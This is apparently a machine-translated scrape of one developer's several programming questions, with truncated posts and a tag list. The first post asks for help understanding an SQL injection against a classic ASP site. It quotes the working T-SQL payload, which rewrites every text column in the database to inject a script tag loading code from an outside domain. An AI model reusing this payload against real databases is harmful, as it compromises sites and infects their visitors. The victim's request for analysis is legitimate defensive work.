我想在这里发帖,因为它与编码有很大关系,本周我必须在我公司的旧ASP(经典)网站上清理.
我们受到了几天前运行的SQL注入攻击的打击,但是我正在摸不着对于SQL服务器(通过这些SQL查询)的"损坏".
说实话,我认为这是非常巧妙的,并且我的公司因为拥有一个几乎没有消毒输入的旧的10年历史的网站而错.
攻击:
122 +声明+%的40s + VARCHAR%284000%29 + +设定40年代%%3Dcast%+ AS + VARCHAR%284000%29%29 + EXEC%28%40年代%29-
它解释为:( 我想要了解的)
set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>30 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=''"></title><script src="http://lilXXXXXXXop.com/sl.php"></script><!--''+RTRIM(CONVERT(VARCHAR(6000),['+@C+'])) where LEFT(RTRIM(CONVERT(VARCHAR(6000),['+@C+'])),17)<>''"></title><script'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
我们已经恢复了备份(预注入)并浏览了整个应用程序并清理了所有输入语句.我们的服务器是防火墙的,所以没有直接的SQL访问,但我想知道还剩下什么,我不得不承认SQL查询是我的头脑.
有人可以解决它并为我解释攻击SQL吗?
APOLOGIES我更新了完整的DUMP和SQL
是否可以使用UglifyJS压缩多个文件?
就像是...
uglifyjs -o app.build.js appfile1.js appfile2.js ...
另外,我在Windows命令提示符下通过NodeJS运行Uglify
我正在寻找一个已经完成的openid登录库,我可以"插入"我的应用程序,并允许使用您在许多易于访问的网站上看到的任何openid,facebook,twitter方法进行访问.
一个例子是Woot.com的登录:
https://account.woot.com/login?returnurl=http%3a%2f%2fwoot.com%2fdefault.aspx
我想要一个我不需要花费大量时间的东西,因为我希望我的用户能够访问这些内容,但我不想牺牲我的大部分开发工具来修补它,或者在facebook工作时搞错了,而不是推特等;
思考?
伙计们,我被困住了,在过去的几个小时里,我的头撞了桌子.
我正在尝试使用一个服务,并且我有8个其他函数,我称之为本质上几乎是IDENTICAL,但是这个函数会导致'SOAP-ERROR:Encoding:违反编码规则'错误.
继承函数调用(为安全起见省略了wsdl):
function CanLoadProduct($data){
$client = new SoapClient('wsdl-url');
$params = array('username' => $this->username,
'password' => $this->password,
'prod' => $data['productid'],
'mdn' => $data['mdn']);
try {
$reply = $client->__soapCall("CanLoadProduct", $params);
} catch (Exception $e) {
echo 'Error: ', $e->getMessage(), "\n";
print_r($params);
die();
}
if( $reply['result'] == 1 ){
return TRUE; // 1 = true
} else {
return FALSE;
}
}
好的,这个函数,连接到web服务,所需的元素是:用户名,密码,prod,mdn,我提供的所有4个作为$ params数组的一部分.用户名/传递是先前定义的,并且工作正常,因为其他8个函数使用Web服务没有任何问题.
$ data []数组(我传递给函数)包含:$ data ['productid'] $ data ['mdn']没有使用其他内容.
我正进入(状态
SOAP-ERROR: Encoding: Violation of encoding rules
由于一些无法解释的原因,谷歌搜索这个错误让我无处可去.其他人遇到这个?运行PHP 5.2.9-2.奇怪的是这与100%的这个功能相同:
function …我已经成为PHP开发人员多年了,我突然意识到我可能会使用更好的开发工具.
例如,我的典型开发设置是
如果您是PHP开发人员,那么您的典型设置是什么?Eclipse(有时对我来说太笨重了)?等等;
我很好奇,如果我遗漏了一些可能节省了大量时间的东西,比如某种动态PHP代码验证器(在我点击F5然后首次亮相错误之前).我目前通过在Notepad ++中看到颜色亮点来实现某种"验证".
我不知道如何在ColdFusion 9中处理这个问题,我有一个表单被提交(POST)与元素复选框,称为items [].
当我做一个<cfdump var="#form#" />没问题的时候,我得到所有用正确名称显示的项目,items[]例如:
struct
ITEMS[] 13,14
FIELDNAMES ITEMS[]
但是会<cfdump var="#form.items[]#" />导致错误.如何访问CF9字段值?以某种方式循环通过它?
我似乎无法对数组做任何事情来获取它的id?思考?我有点难过,ColdFusion不是在网上找到示例/引用的最简单的语言.;)
有没有正确的方法来解决这个问题?我需要从那里获取ID,以便我可以参考表单中检查的行,因此我可以跟进一个动作.
谢谢!
我正在考虑更新到Firefox 4(目前正在运行Firefox 3.6.15 - 特别是坚持不是软件问题!)并且在Web开发方面存在一些问题.
我唯一担心的是两者之间是否存在任何兼容性问题(CSS/HTML)或怪癖.我不想在一个网站上使用Firefox 4而使用Firefox 3使用Firefox 4时看到类似3px间距的东西(几乎像IE6 vs IE7 vs IE8惨败,如果你得到我的漂移).
最后,我只是检查Firefox 4是否像往常一样显示具有更新"引擎"的网站/网络应用程序(这是我所期望的).
思考?有谁比较这个级别?而且我不只是在谈论CSS重置级别的事情,而是我正在考虑这些兼容性.
希望我对此表示关注.我似乎无法找到除FF4增强列表之外的任何比较(通过FF3),我不是要将此作为软件问题,而是应该知道我通过升级而遗漏的任何输出更改.在开发和浏览器兼容性方面,我不想错过重要的差异.
谢谢.
我正在对一组用户进行排序,我有4个像这样的分组(显示2个):
<div id="team1" class="groupWrapper">
<div id="p1" class="groupItem"><div class="itemHeader"><div class="first">John</div><div class="skill">15</div></div></div>
<div id="p2" class="groupItem"><div class="itemHeader"><div class="first">Luke</div><div class="skill">5</div></div></div>
<div id="p3" class="groupItem"><div class="itemHeader"><div class="first">Mary</div><div class="skill">10</div></div></div>
<div id="p4" class="groupItem"><div class="itemHeader"><div class="first">Bob</div><div class="skill">25</div></div></div>
</div>
<div id="team2" class="groupWrapper">
<div id="p5" class="groupItem"><div class="itemHeader"><div class="first">Ryn</div><div class="skill">35</div></div></div>
<div id="p6" class="groupItem"><div class="itemHeader"><div class="first">Kevin</div><div class="skill">15</div></div></div>
<div id="p7" class="groupItem"><div class="itemHeader"><div class="first">Susie</div><div class="skill">5</div></div></div>
<div id="p8" class="groupItem"><div class="itemHeader"><div class="first">Jill</div><div class="skill">5</div></div></div>
</div>
...
现在我想要做的是在每个组进行排序时动态总结每个组的技能值.
我的排序jQuery脚本在这里:
$(document).ready(
function () {
$('div.groupWrapper').Sortable(
{
accept: 'groupItem',
helperclass: 'sortHelper',
activeclass : 'sortableactive',
hoverclass : 'sortablehover',
handle: 'div.itemHeader',
tolerance: 'pointer', …所以我的问题相对简单,我可以创建引用dll中的类的VB6应用程序,然后在运行时将该dll替换为另一个吗?
现在我的初步猜测是......在VB6中没有机会.
所以我的想法转向VB.net互操作dll.我可以在这里做,然后从VB调用interop dll吗?
再一次,我的猜测是没有....但如果有人知道不同,我会很高兴.
我认为唯一可以实际工作的是DI in .Net,但是我只限于.net 2,或者是一个大推动的3.5,所以我不知道这是否可行.
所以对于背景....
我有一个特定网站使用的DLL,但我们不想将它发送给每个人.相反,我们想要构建一个只有接口设置的克隆dll,以便完成VB6构建.当它到达需要它的站点时,他们想要替换虚拟dll,而是放入他们的版本.
注意:我们确实在安装RegFreeCOM时使用它,因此我确实拥有可以根据需要使用的清单文件.
任何想法将不胜感激.
缺口
这可能是一个非常懒惰的问题,但我保证不是.我已经尝试了几天才能使这个工作,但我不能.
我得到了一个WSDL文件,我需要在PHP中为它创建一个SOAP服务.谁能告诉我这样做的正确方法是什么?
服务的接收者期望在调用getMember方法时返回"User"对象.
这是WSDL
<?xml version="1.0" encoding="UTF-8"?>
<wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:mime="http://schemas.xmlsoap.org/wsdl/mime/" xmlns:tns="http://tempuri.org/" xmlns:s="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://schemas.xmlsoap.org/wsdl/soap12/" xmlns:http="http://schemas.xmlsoap.org/wsdl/http/" targetNamespace="http://tempuri.org/" xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/">
<wsdl:types>
<s:schema elementFormDefault="qualified" targetNamespace="http://tempuri.org/">
<s:element name="getMember">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="memCode" type="s:string"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name="getMemberResponse">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="getMemberResult" type="s:string"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name="getMemberByUsernameAndPassword">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="username" type="s:string"/>
<s:element minOccurs="0" maxOccurs="1" name="password" type="s:string"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name="getMemberByUsernameAndPasswordResponse">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="getMemberByUsernameAndPasswordResult" type="s:string"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name="insertMember">
<s:complexType>
<s:sequence>
<s:element …php ×4
html ×3
soap ×2
arrays ×1
asp-classic ×1
codeigniter ×1
coldfusion ×1
com-interop ×1
compare ×1
facebook ×1
firefox ×1
javascript ×1
jquery ×1
login ×1
mysql ×1
node.js ×1
openid ×1
phpmyadmin ×1
soapserver ×1
sorting ×1
sql ×1
twitter ×1
uglifyjs ×1
vb.net ×1
vb6 ×1
wsdl ×1
xml ×1
xss ×1